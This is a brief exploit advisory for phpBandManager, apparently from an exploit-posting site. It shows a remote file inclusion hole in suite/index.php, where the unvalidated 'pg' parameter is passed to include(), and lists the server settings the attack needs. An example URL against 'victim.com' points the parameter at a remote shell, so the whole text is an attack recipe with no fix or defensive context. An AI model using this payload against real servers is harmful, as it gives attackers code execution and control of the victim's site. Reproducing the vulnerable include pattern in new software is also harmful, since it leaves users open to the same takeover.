author:koray
greetz:cigicigi.net
script:http://sourceforge.net/projects/phpbandmanager

allow_url_fopen:on or register_globals:on

vuln;

/bandmanager/suite/index.php

include($_GET['pg'].".php");

example;

http://www.victim.com/suite/index.php?pg=shell link?